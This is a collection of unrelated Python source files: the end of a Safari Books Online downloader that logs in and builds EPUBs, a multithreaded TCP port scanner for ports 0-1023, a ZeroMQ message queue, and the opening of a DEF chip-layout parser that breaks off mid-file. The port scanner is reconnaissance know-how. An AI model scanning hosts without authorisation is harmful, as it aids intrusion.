self.handle_cookie_update(response.raw.headers.getlist("Set-Cookie"))
self.display.last_request = (
url, data, kwargs, response.status_code, "\n".join(
["\t{}: {}".format(*h) for h in response.headers.items()]
), response.text
)
except (requests.ConnectionError, requests.ConnectTimeout, requests.RequestException) as request_exception:
self.display.error(str(request_exception))
return 0
if response.is_redirect and perform_redirect:
return self.requests_provider(response.next.url, is_post, None, perform_redirect)
# TODO How about **kwargs?
return response
@staticmethod
def parse_cred(cred):
if ":" not in cred:
return False
sep = cred.index(":")
new_cred = ["", ""]
new_cred[0] = cred[:sep].strip("'").strip('"')
if "@" not in new_cred[0]:
return False
new_cred[1] = cred[sep + 1:]
return new_cred
def do_login(self, email, password):
response = self.requests_provider(self.LOGIN_ENTRY_URL)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
next_parameter = None
try:
next_parameter = parse_qs(urlparse(response.request.url).query)["next"][0]
except (AttributeError, ValueError, IndexError):
self.display.exit("Login: unable to complete login on Safari Books Online. Try again...")
redirect_uri = API_ORIGIN_URL + quote_plus(next_parameter)
response = self.requests_provider(
self.LOGIN_URL,
is_post=True,
json={
"email": email,
"password": password,
"redirect_uri": redirect_uri
},
perform_redirect=False
)
if response == 0:
self.display.exit("Login: unable to perform auth to Safari Books Online.\n Try again...")
if response.status_code != 200: # TODO To be reviewed
try:
error_page = html.fromstring(response.text)
errors_message = error_page.xpath("//ul[@class='errorlist']//li/text()")
recaptcha = error_page.xpath("//div[@class='g-recaptcha']")
messages = ([" `%s`" % error for error in errors_message
if "password" in error or "email" in error] if len(errors_message) else []) + \
([" `ReCaptcha required (wait or do logout from the website).`"] if len(
recaptcha) else [])
self.display.exit(
"Login: unable to perform auth login to Safari Books Online.\n" + self.display.SH_YELLOW +
"[*]" + self.display.SH_DEFAULT + " Details:\n" + "%s" % "\n".join(
messages if len(messages) else [" Unexpected error!"])
)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Login: your login went wrong and it encountered in an error"
" trying to parse the login details of Safari Books Online. Try again..."
)
self.jwt = response.json() # TODO: save JWT Tokens and use the refresh_token to restore user session
response = self.requests_provider(self.jwt["redirect_uri"])
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
def check_login(self):
response = self.requests_provider(PROFILE_URL, perform_redirect=False)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
elif response.status_code != 200:
self.display.exit("Authentication issue: unable to access profile page.")
elif "user_type\":\"Expired\"" in response.text:
self.display.exit("Authentication issue: account subscription expired.")
self.display.info("Successfully authenticated.", state=True)
def get_book_info(self):
response = self.requests_provider(self.api_url)
if response == 0:
self.display.exit("API: unable to retrieve book info.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "last_chapter_read" in response:
del response["last_chapter_read"]
for key, value in response.items():
if value is None:
response[key] = 'n/a'
return response
def get_book_chapters(self, page=1):
response = self.requests_provider(urljoin(self.api_url, "chapter/?page=%s" % page))
if response == 0:
self.display.exit("API: unable to retrieve book chapters.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "results" not in response or not len(response["results"]):
self.display.exit("API: unable to retrieve book chapters.")
if response["count"] > sys.getrecursionlimit():
sys.setrecursionlimit(response["count"])
result = []
result.extend([c for c in response["results"] if "cover" in c["filename"] or "cover" in c["title"]])
for c in result:
del response["results"][response["results"].index(c)]
result += response["results"]
return result + (self.get_book_chapters(page + 1) if response["next"] else [])
def get_default_cover(self):
response = self.requests_provider(self.book_info["cover"], stream=True)
if response == 0:
self.display.error("Error trying to retrieve the cover: %s" % self.book_info["cover"])
return False
file_ext = response.headers["Content-Type"].split("/")[-1]
with open(os.path.join(self.images_path, "default_cover." + file_ext), 'wb') as i:
for chunk in response.iter_content(1024):
i.write(chunk)
return "default_cover." + file_ext
def get_html(self, url):
response = self.requests_provider(url)
if response == 0 or response.status_code != 200:
self.display.exit(
"Crawler: error trying to retrieve this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
root = None
try:
root = html.fromstring(response.text, base_url=SAFARI_BASE_URL)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Crawler: error trying to parse this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
return root
@staticmethod
def url_is_absolute(url):
return bool(urlparse(url).netloc)
@staticmethod
def is_image_link(url: str):
return pathlib.Path(url).suffix[1:].lower() in ["jpg", "jpeg", "png", "gif"]
def link_replace(self, link):
if link and not link.startswith("mailto"):
if not self.url_is_absolute(link):
if any(x in link for x in ["cover", "images", "graphics"]) or \
self.is_image_link(link):
image = link.split("/")[-1]
return "Images/" + image
return link.replace(".html", ".xhtml")
else:
if self.book_id in link:
return self.link_replace(link.split(self.book_id)[-1])
return link
@staticmethod
def get_cover(html_root):
lowercase_ns = etree.FunctionNamespace(None)
lowercase_ns["lower-case"] = lambda _, n: n[0].lower() if n and len(n) else ""
images = html_root.xpath("//img[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover') or"
"contains(lower-case(@alt), 'cover')]")
if len(images):
return images[0]
divs = html_root.xpath("//div[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(divs):
return divs[0]
a = html_root.xpath("//a[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(a):
return a[0]
return None
def parse_html(self, root, first_page=False):
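# Sanity check run on roughly 1 page in 5 (random() > 0.8): if a 'controls' div
# with links is present, the page is treated as an API error - presumably the
# marker of a preview or expired-session page rather than real book content.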
if random() > 0.8:
if len(root.xpath("//div[@class='controls']/a/text()")):
self.display.exit(self.display.api_error(" "))
book_content = root.xpath("//div[@id='sbo-rt-content']")
if not len(book_content):
self.display.exit(
"Parser: book content's corrupted or not present: %s (%s)" %
(self.filename, self.chapter_title)
)
page_css = ""
if len(self.chapter_stylesheets):
for chapter_css_url in self.chapter_stylesheets:
if chapter_css_url not in self.css:
self.css.append(chapter_css_url)
self.display.log("Crawler: found a new CSS at %s" % chapter_css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(chapter_css_url))
stylesheet_links = root.xpath("//link[@rel='stylesheet']")
if len(stylesheet_links):
for s in stylesheet_links:
css_url = urljoin("https:", s.attrib["href"]) if s.attrib["href"][:2] == "//" \
else urljoin(self.base_url, s.attrib["href"])
if css_url not in self.css:
self.css.append(css_url)
self.display.log("Crawler: found a new CSS at %s" % css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(css_url))
stylesheets = root.xpath("//style")
if len(stylesheets):
for css in stylesheets:
if "data-template" in css.attrib and len(css.attrib["data-template"]):
css.text = css.attrib["data-template"]
del css.attrib["data-template"]
try:
page_css += html.tostring(css, method="xml", encoding='unicode') + "\n"
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse one CSS found in this page: %s (%s)" %
(self.filename, self.chapter_title)
)
# TODO: add all not covered tag for `link_replace` function
svg_image_tags = root.xpath("//image")
if len(svg_image_tags):
for img in svg_image_tags:
image_attr_href = [x for x in img.attrib.keys() if "href" in x]
if len(image_attr_href):
svg_url = img.attrib.get(image_attr_href[0])
svg_root = img.getparent().getparent()
new_img = svg_root.makeelement("img")
new_img.attrib.update({"src": svg_url})
svg_root.remove(img.getparent())
svg_root.append(new_img)
book_content = book_content[0]
book_content.rewrite_links(self.link_replace)
xhtml = None
try:
if first_page:
is_cover = self.get_cover(book_content)
if is_cover is not None:
page_css = "<style>" \
"body{display:table;position:absolute;margin:0!important;height:100%;width:100%;}" \
"#Cover{display:table-cell;vertical-align:middle;text-align:center;}" \
"img{height:90vh;margin-left:auto;margin-right:auto;}" \
"</style>"
cover_html = html.fromstring("<div id=\"Cover\"></div>")
cover_div = cover_html.xpath("//div")[0]
cover_img = cover_div.makeelement("img")
cover_img.attrib.update({"src": is_cover.attrib["src"]})
cover_div.append(cover_img)
book_content = cover_html
self.cover = is_cover.attrib["src"]
xhtml = html.tostring(book_content, method="xml", encoding='unicode')
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse HTML of this page: %s (%s)" %
(self.filename, self.chapter_title)
)
return page_css, xhtml
@staticmethod
def escape_dirname(dirname, clean_space=False):
if ":" in dirname:
if dirname.index(":") > 15:
dirname = dirname.split(":")[0]
elif "win" in sys.platform:
dirname = dirname.replace(":", ",")
for ch in ['~', '#', '%', '&', '*', '{', '}', '\\', '<', '>', '?', '/', '`', '\'', '"', '|', '+', ':']:
if ch in dirname:
dirname = dirname.replace(ch, "_")
return dirname if not clean_space else dirname.replace(" ", "")
def create_dirs(self):
if os.path.isdir(self.BOOK_PATH):
self.display.log("Book directory already exists: %s" % self.BOOK_PATH)
else:
os.makedirs(self.BOOK_PATH)
oebps = os.path.join(self.BOOK_PATH, "OEBPS")
if not os.path.isdir(oebps):
self.display.book_ad_info = True
os.makedirs(oebps)
self.css_path = os.path.join(oebps, "Styles")
if os.path.isdir(self.css_path):
self.display.log("CSSs directory already exists: %s" % self.css_path)
else:
os.makedirs(self.css_path)
self.display.css_ad_info.value = 1
self.images_path = os.path.join(oebps, "Images")
if os.path.isdir(self.images_path):
self.display.log("Images directory already exists: %s" % self.images_path)
else:
os.makedirs(self.images_path)
self.display.images_ad_info.value = 1
def save_page_html(self, contents):
self.filename = self.filename.replace(".html", ".xhtml")
open(os.path.join(self.BOOK_PATH, "OEBPS", self.filename), "wb") \
.write(self.BASE_HTML.format(contents[0], contents[1]).encode("utf-8", 'xmlcharrefreplace'))
self.display.log("Created: %s" % self.filename)
def get(self):
len_books = len(self.book_chapters)
for _ in range(len_books):
if not len(self.chapters_queue):
return
first_page = len_books == len(self.chapters_queue)
next_chapter = self.chapters_queue.pop(0)
self.chapter_title = next_chapter["title"]
self.filename = next_chapter["filename"]
# Images
if "images" in next_chapter and len(next_chapter["images"]):
self.images.extend(urljoin(next_chapter['asset_base_url'], img_url)
for img_url in next_chapter['images'])
# Stylesheets
self.chapter_stylesheets = []
if "stylesheets" in next_chapter and len(next_chapter["stylesheets"]):
self.chapter_stylesheets.extend(x["url"] for x in next_chapter["stylesheets"])
if "site_styles" in next_chapter and len(next_chapter["site_styles"]):
self.chapter_stylesheets.extend(next_chapter["site_styles"])
if os.path.isfile(os.path.join(self.BOOK_PATH, "OEBPS", self.filename.replace(".html", ".xhtml"))):
if not self.display.book_ad_info and \
next_chapter not in self.book_chapters[:self.book_chapters.index(next_chapter)]:
self.display.info(
("File `%s` already exists.\n"
" If you want to download again all the book,\n"
" please delete the output directory '" + self.BOOK_PATH + "' and restart the program.")
% self.filename.replace(".html", ".xhtml")
)
self.display.book_ad_info = 2
else:
self.save_page_html(self.parse_html(self.get_html(next_chapter["content"]), first_page))
self.display.state(len_books, len_books - len(self.chapters_queue))
def _thread_download_css(self, url):
css_file = os.path.join(self.css_path, "Style{0:0>2}.css".format(self.css.index(url)))
if os.path.isfile(css_file):
if not self.display.css_ad_info.value and url not in self.css[:self.css.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the CSSs,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
css_file)
self.display.css_ad_info.value = 1
else:
response = self.requests_provider(url)
if response == 0:
self.display.error("Error trying to retrieve this CSS: %s\n From: %s" % (css_file, url))
with open(css_file, 'wb') as s:
s.write(response.content)
self.css_done_queue.put(1)
self.display.state(len(self.css), self.css_done_queue.qsize())
def _thread_download_images(self, url):
image_name = url.split("/")[-1]
image_path = os.path.join(self.images_path, image_name)
if os.path.isfile(image_path):
if not self.display.images_ad_info.value and url not in self.images[:self.images.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the images,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
image_name)
self.display.images_ad_info.value = 1
else:
response = self.requests_provider(urljoin(SAFARI_BASE_URL, url), stream=True)
if response == 0:
self.display.error("Error trying to retrieve this image: %s\n From: %s" % (image_name, url))
return
with open(image_path, 'wb') as img:
for chunk in response.iter_content(1024):
img.write(chunk)
self.images_done_queue.put(1)
self.display.state(len(self.images), self.images_done_queue.qsize())
def _start_multiprocessing(self, operation, full_queue):
if len(full_queue) > 5:
for i in range(0, len(full_queue), 5):
self._start_multiprocessing(operation, full_queue[i:i + 5])
else:
process_queue = [Process(target=operation, args=(arg,)) for arg in full_queue]
for proc in process_queue:
proc.start()
for proc in process_queue:
proc.join()
def collect_css(self):
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for css_url in self.css:
self._thread_download_css(css_url)
def collect_images(self):
if self.display.book_ad_info == 2:
self.display.info("Some of the book contents were already downloaded.\n"
" If you want to be sure that all the images will be downloaded,\n"
" please delete the output direcotry '" + self.BOOK_PATH +
"' and restart the program.")
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for image_url in self.images:
self._thread_download_images(image_url)
def create_content_opf(self):
self.css = next(os.walk(self.css_path))[2]
self.images = next(os.walk(self.images_path))[2]
manifest = []
spine = []
for c in self.book_chapters:
c["filename"] = c["filename"].replace(".html", ".xhtml")
item_id = escape("".join(c["filename"].split(".")[:-1]))
manifest.append("<item id=\"{0}\" href=\"{1}\" media-type=\"application/xhtml+xml\" />".format(
item_id, c["filename"]
))
spine.append("<itemref idref=\"{0}\"/>".format(item_id))
for i in set(self.images):
dot_split = i.split(".")
head = "img_" + escape("".join(dot_split[:-1]))
extension = dot_split[-1]
manifest.append("<item id=\"{0}\" href=\"Images/{1}\" media-type=\"image/{2}\" />".format(
head, i, "jpeg" if "jp" in extension else extension
))
for i in range(len(self.css)):
manifest.append("<item id=\"style_{0:0>2}\" href=\"Styles/Style{0:0>2}.css\" "
"media-type=\"text/css\" />".format(i))
authors = "\n".join("<dc:creator opf:file-as=\"{0}\" opf:role=\"aut\">{0}</dc:creator>".format(
escape(aut.get("name", "n/d"))
) for aut in self.book_info.get("authors", []))
subjects = "\n".join("<dc:subject>{0}</dc:subject>".format(escape(sub.get("name", "n/d")))
for sub in self.book_info.get("subjects", []))
return self.CONTENT_OPF.format(
(self.book_info.get("isbn", self.book_id)),
escape(self.book_title),
authors,
escape(self.book_info.get("description", "")),
subjects,
", ".join(escape(pub.get("name", "")) for pub in self.book_info.get("publishers", [])),
escape(self.book_info.get("rights", "")),
self.book_info.get("issued", ""),
self.cover,
"\n".join(manifest),
"\n".join(spine),
self.book_chapters[0]["filename"].replace(".html", ".xhtml")
)
@staticmethod
def parse_toc(l, c=0, mx=0):
r = ""
for cc in l:
c += 1
if int(cc["depth"]) > mx:
mx = int(cc["depth"])
r += "<navPoint id=\"{0}\" playOrder=\"{1}\">" \
"<navLabel><text>{2}</text></navLabel>" \
"<content src=\"{3}\"/>".format(
cc["fragment"] if len(cc["fragment"]) else cc["id"], c,
escape(cc["label"]), cc["href"].replace(".html", ".xhtml").split("/")[-1]
)
if cc["children"]:
sr, c, mx = SafariBooks.parse_toc(cc["children"], c, mx)
r += sr
r += "</navPoint>\n"
return r, c, mx
def create_toc(self):
response = self.requests_provider(urljoin(self.api_url, "toc/"))
if response == 0:
self.display.exit("API: unable to retrieve book chapters. "
"Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!")
response = response.json()
if not isinstance(response, list) and len(response.keys()) == 1:
self.display.exit(
self.display.api_error(response) +
" Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!"
)
navmap, _, max_depth = self.parse_toc(response)
return self.TOC_NCX.format(
(self.book_info["isbn"] if self.book_info["isbn"] else self.book_id),
max_depth,
self.book_title,
", ".join(aut.get("name", "") for aut in self.book_info.get("authors", [])),
navmap
)
def create_epub(self):
open(os.path.join(self.BOOK_PATH, "mimetype"), "w").write("application/epub+zip")
meta_info = os.path.join(self.BOOK_PATH, "META-INF")
if os.path.isdir(meta_info):
self.display.log("META-INF directory already exists: %s" % meta_info)
else:
os.makedirs(meta_info)
open(os.path.join(meta_info, "container.xml"), "wb").write(
self.CONTAINER_XML.encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "content.opf"), "wb").write(
self.create_content_opf().encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "toc.ncx"), "wb").write(
self.create_toc().encode("utf-8", "xmlcharrefreplace")
)
zip_file = os.path.join(PATH, "Books", self.book_id)
if os.path.isfile(zip_file + ".zip"):
os.remove(zip_file + ".zip")
shutil.make_archive(zip_file, 'zip', self.BOOK_PATH)
os.rename(zip_file + ".zip", os.path.join(self.BOOK_PATH, self.book_id) + ".epub")
# MAIN
if __name__ == "__main__":
arguments = argparse.ArgumentParser(prog="safaribooks.py",
description="Download and generate an EPUB of your favorite books"
" from Safari Books Online.",
add_help=False,
allow_abbrev=False)
login_arg_group = arguments.add_mutually_exclusive_group()
login_arg_group.add_argument(
"--cred", metavar="<EMAIL:PASS>", default=False,
help="Credentials used to perform the auth login on Safari Books Online."
" Es. ` --cred \"account_mail@mail.com:password01\" `."
)
login_arg_group.add_argument(
"--login", action='store_true',
help="Prompt for credentials used to perform the auth login on Safari Books Online."
)
arguments.add_argument(
"--no-cookies", dest="no_cookies", action='store_true',
help="Prevent your session data to be saved into `cookies.json` file."
)
arguments.add_argument(
"--kindle", dest="kindle", action='store_true',
help="Add some CSS rules that block overflow on `table` and `pre` elements."
" Use this option if you're going to export the EPUB to E-Readers like Amazon Kindle."
)
arguments.add_argument(
"--preserve-log", dest="log", action='store_true', help="Leave the `info_XXXXXXXXXXXXX.log`"
" file even if there isn't any error."
)
arguments.add_argument("--help", action="help", default=argparse.SUPPRESS, help='Show this help message.')
arguments.add_argument(
"bookid", metavar='<BOOK ID>',
help="Book digits ID that you want to download. You can find it in the URL (X-es):"
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
)
args_parsed = arguments.parse_args()
if args_parsed.cred or args_parsed.login:
user_email = ""
pre_cred = ""
if args_parsed.cred:
pre_cred = args_parsed.cred
else:
user_email = input("Email: ")
passwd = getpass.getpass("Password: ")
pre_cred = user_email + ":" + passwd
parsed_cred = SafariBooks.parse_cred(pre_cred)
if not parsed_cred:
arguments.error("invalid credential: %s" % (
args_parsed.cred if args_parsed.cred else (user_email + ":*******")
))
args_parsed.cred = parsed_cred
else:
if args_parsed.no_cookies:
arguments.error("invalid option: `--no-cookies` is valid only if you use the `--cred` option")
if len(args_parsed.bookid) > 0:
book_url_regex = r"['\"]*http[s]?:\/\/[a-zA-Z0-9.\-/]+\/(\d{10,15})\/*['\"]*" # Matches book URL
pattern = re.compile(book_url_regex)
matchURL = re.search(pattern, args_parsed.bookid)
book_id_regex = r"['\"]*(\d{10,15})/*['\"]*" # Matches book ID
pattern = re.compile(book_id_regex)
matchID = re.search(pattern, args_parsed.bookid)
if matchURL:
bookID = matchURL.group(1)
elif matchID:
bookID = matchID.group(1)
else:
bookID = None
arguments.error("Invalid book ID or URL")
if str.isdecimal(bookID):
args_parsed.bookid = bookID
else:
arguments.error("Invalid book ID")
else:
arguments.error("Book ID must not be empty")
SafariBooks(args_parsed)
# Hint: if you want to download more than one book at once, initialize more than one instance of `SafariBooks`...
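# A minimal sketch of that idea (hypothetical, not part of the original flow; it
# assumes every ID in `extra_book_ids` is a valid book ID and simply clones the
# already-parsed arguments for each one):
#
#   extra_book_ids = ["XXXXXXXXXXXXX", "YYYYYYYYYYYYY"]
#   for extra_id in extra_book_ids:
#       extra_args = argparse.Namespace(**vars(args_parsed))
#       extra_args.bookid = extra_id
#       SafariBooks(extra_args)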
sys.exit(0)
|
port_scanner.py
|
#!/usr/bin/python
################
# Port Scanner - A Multi-threaded approach
# Scans the well-known system ports (0-1023) and reports whether they are open or closed.
# To increase scanning performance, adjust the delay (the per-port connect timeout) where necessary.
################
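# For example, a faster but less forgiving sweep could be started as (hypothetical
# value, not part of the original script):
#
#   scan_ports(ip, 0.5)   # 0.5 s per-port timeout instead of the 3 s used below
#
# since the delay is handed straight to socket.settimeout() inside try_port().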
import socket, threading
host = raw_input("Enter an address to scan: ")
ip = socket.gethostbyname(host)
threads = []
open_ports = {}
def try_port(ip, port, delay, open_ports):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4 TCP socket
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(delay)
result = sock.connect_ex((ip, port))
if result == 0:
open_ports[port] = 'open'
return True
else:
open_ports[port] = 'closed'
return None
def scan_ports(ip, delay):
# Create one scanning thread per well-known port (0-1023 inclusive).
for port in range(0, 1024):
thread = threading.Thread(target=try_port, args=(ip, port, delay, open_ports))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Report the results once every probe has finished.
for port in sorted(open_ports):
if open_ports[port] == 'open':
print '\nport number ' + str(port) + ' is open'
print '\nscan complete!'
if __name__ == "__main__":
scan_ports(ip, 3)
|
messaging.py
|
from threading import Thread
from traceback import format_exc
import zmq
import logging
class MessageQueue():
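# Lightweight one-way message queue on top of ZeroMQ: outgoing messages go
# through a shared PUSH socket (connect_output/send), while start_listening()
# spawns a daemon thread that binds a PULL socket and hands every received
# message to the on_recv callback.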
def __init__(self):
self.__handlers = {}
self.__zmq_context = zmq.Context()
self.__out_socket = self.__zmq_context.socket(zmq.PUSH)
self.__thread = None
self.__protocol = None
self.__port = 0
self.__interface = None
self.on_recv = None
@property
def port(self):
return self.__port
@property
def interface(self):
return self.__interface
@property
def protocol(self):
return self.__protocol
@property
def address(self):
# Full endpoint string of the listening socket, e.g. 'tcp://*:5555'.
return '%s://%s:%s' % (self.__protocol, self.__interface, self.__port)
def connect_output(self, *addresses):
# Connect the outgoing PUSH socket to one or more PULL endpoints.
for address in addresses:
self.__out_socket.connect(address)
def start_listening(self, on_recv=None, port=0, protocol='tcp', interface='*'):
if self.__thread:
return
if on_recv:
self.on_recv = on_recv
self.__protocol = protocol
self.__interface = interface
def listen():
context = zmq.Context()
socket = context.socket(zmq.PULL)
if port:
self.__port = port
socket.bind(self.address)
else:
self.__port = socket.bind_to_random_port('%s://%s' % (protocol, interface))
while True:
try:
message = socket.recv()
if on_recv:
on_recv(message)
except Exception as e:
logging.error(format_exc())
self.__thread = None
self.__thread = Thread(target=listen)
self.__thread.daemon = True
self.__thread.start()
def send(self, message):
self.__out_socket.send(message)
_instances = {}
@classmethod
def instance(cls, name='MessageQueue'):
try:
return cls._instances[name]
except KeyError:
cls._instances[name] = cls()
return cls._instances[name]
|
def_parser.py
|
"""
Author: Geraldo Pradipta
BSD 3-Clause License
Copyright (c) 2019, The Regents of the University of Minnesota
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import Class as cl
#from build_RC_tree import build_RC_tree
from build_path import build_path
from build_path import parse_net
import via_section_def_parser as def_via
from lefParser import compute_via_number_of_cuts
import global_var as glob
def def_parser(def_file, pins, nets, cell_coor_dict, load_cap_dict, cell_dimension, buildPath = True):
print('# READING DEF')
with open(def_file) as f:
blocks = []
mapping_number = 1
# Parsing Components Section
parsing_component = False
comp_syn = False
cur_comp =[]
# NET BOOLEAN
find_net = False
find_data = False
# PIN BOOLEAN
find_pin = False
pin_info = False
# VIAS BOOLEAN
find_vias = False
via_info = False
for line in f:
""" HEADER SECTION"""
# Finding the PER UNIT VALUE
if re.search('UNITS DISTANCE MICRONS',line,flags=re.IGNORECASE):
data = re.findall(r'\d+', line)
glob.UNIT_DISTANCE = (int(data[0]))
if re.match('^VERSION\s*(\d+\.?\d*)\s*[;]', line):
def_version = re.match('^VERSION\s*(\d+\.?\d*)\s*[;]', line).group(1)
if re.match('^DIVIDERCHAR\s*["](.+)["]\s*[;]', line):
glob.DIVIDER = re.match('^DIVIDERCHAR\s*["](.+)["]\s*[;]', line).group(1)
if re.match('^BUSBITCHARS\s*["](.+)["]\s*[;]', line):
glob.BUS_CHAR = re.match('^BUSBITCHARS\s*["](.+)["]\s*[;]', line).group(1)
if re.match('^DESIGN\s*\w+\s*[;]', line):
glob.DESIGN = re.match('^DESIGN\s*(\w+)\s*[;]', line).group(1)
"""" END HEADER SECTION """
"""FILLING THE FIRST PART OF THE RECT CLASS"""
if re.match('^[\t ]*COMPONENTS \d+',line, flags=re.IGNORECASE):
parsing_component = True
continue
if re.match('^[\t ]*END COMPONENTS',line, flags=re.IGNORECASE):
parsing_component = False
# Create dictionary that contains all the COMPONENTS info
create_block_dict(blocks, load_cap_dict, cell_dimension, cell_coor_dict)
continue
if parsing_component:
if re.match('^[\t ]*-[\t ]+\w+[\t ]+\w+',line):
comp_name = re.search(r'[\t ]*-[\t ]+(\w+)[\t ]+(\w+)', line)
cur_comp = cl.Component(name = comp_name.group(1), cell=comp_name.group(2), number = mapping_number)
comp_syn = True
mapping_number += 1
if re.search('PLACED|FIXED|COVER',line,flags=re.IGNORECASE) and comp_syn:
comp_loc = re.search(r'[+] (PLACED|FIXED|COVER)\s+[(] ([-+]?\d+\.?\d*)\s+([-+]?\d+\.?\d*) [)] (\w+)', line)
cur_comp.set_location(comp_loc.group(2), comp_loc.group(3))
cur_comp.set_orientation(comp_loc.group(4))
if re.search('PLACED|FIXED|COVER',line,flags=re.IGNORECASE) and comp_syn:
Property = re.search(r'[+] (PROPERTY)\s+(\w+)\s+([-+]?\d+\.?\d*|\w+)', line)
if Property != None:
cur_comp.set_property([Property.group(2), Property.group(3)])
if re.search(';',line) and comp_syn:  # semicolon terminates the component entry
comp_syn = False
blocks.append(cur_comp)
""" FIRST PART ENDS HERE """
""" PINS START """
if re.match('^[\t ]*PINS \d+',line, flags=re.IGNORECASE):
find_pin = True
continue
if re.match('^[\t ]*END PINS*',line, flags=re.IGNORECASE):
find_pin = False
continue
if find_pin:
if re.match('^\s*-\s+(\w+)',line):
pin_info = True
pin_class = cl.Pin(number = mapping_number)
pin_class.set_name(re.match('^\s*-\s+(\S+)\s*',line).group(1))
mapping_number += 1
if pin_info:
if re.match('. .+',line):
data = re.findall(r'(?![(|)|+|;])\S+', line)
processPinData(pin_class, data)
if re.search(';',line):
pin_info = False
add_pin_info_toDict(pin_class, pins)
continue
""" END PINS """
""" VIAS SECTION """
if find_vias:
if re.search(r';', line):
via_info = False
# Set the cut layer of the via
num_cuts = compute_via_number_of_cuts(cur_via, glob.TECH_LEF_DICT)
cur_via.set_viaCuts(num_cuts)
def_via.append_via_data_to_dict(cur_via, glob.TECH_LEF_DICT)
if via_info:
def_via.parse_def_via_section(line, cur_via, glob.TECH_LEF_DICT)
if re.match(r'^\s*[-]\s+(\w+)', line):
via_name = re.findall(r'\S+', line)
via_name = (via_name[1])
cur_via = cl.LEF_VIA_Info(via_name = via_name)
via_info = True
if re.match('^VIAS\s+\d+\s+[;]', line):
find_vias = True
if re.match('^END VIAS*', line):
find_vias = False
""" END VIA SECTION """
""" NETS PART """
if re.match('^[\t ]*NETS \d+',line, flags=re.IGNORECASE):
find_net = True
print('# Process Nets information...')
net_count = 0
continue
if re.match('^[\t ]*END NETS*',line, flags=re.IGNORECASE):
find_net = False
print('# Finished processing Nets information')
print('# Total Net Count: {}'.format(net_count))
continue
if find_net == True:
if re.match('^[\t ]*-[\t ]+\w+',line):
mapped = False
data = re.findall(r'\S+', line)
# Create an Instance of a net
cur_net = cl.NET(data[1])
cur_net.add_cell = blocks
# ADDING THE MAPPING NUMBER OF THE NET TO THE PIN INFO
if data[1] in pins:
cur_net.number = pins[data[1]]['number']
mapped = True
if not mapped:
cur_net.number = mapping_number
mapping_number += 1
find_data = True
# End of the particular NET, process the wire data
if re.search('^\s*;',line):  # semicolon at the beginning of the line
find_data = False
net_count += 1
if cur_net.wire_list == []:
nets.append(cur_net)
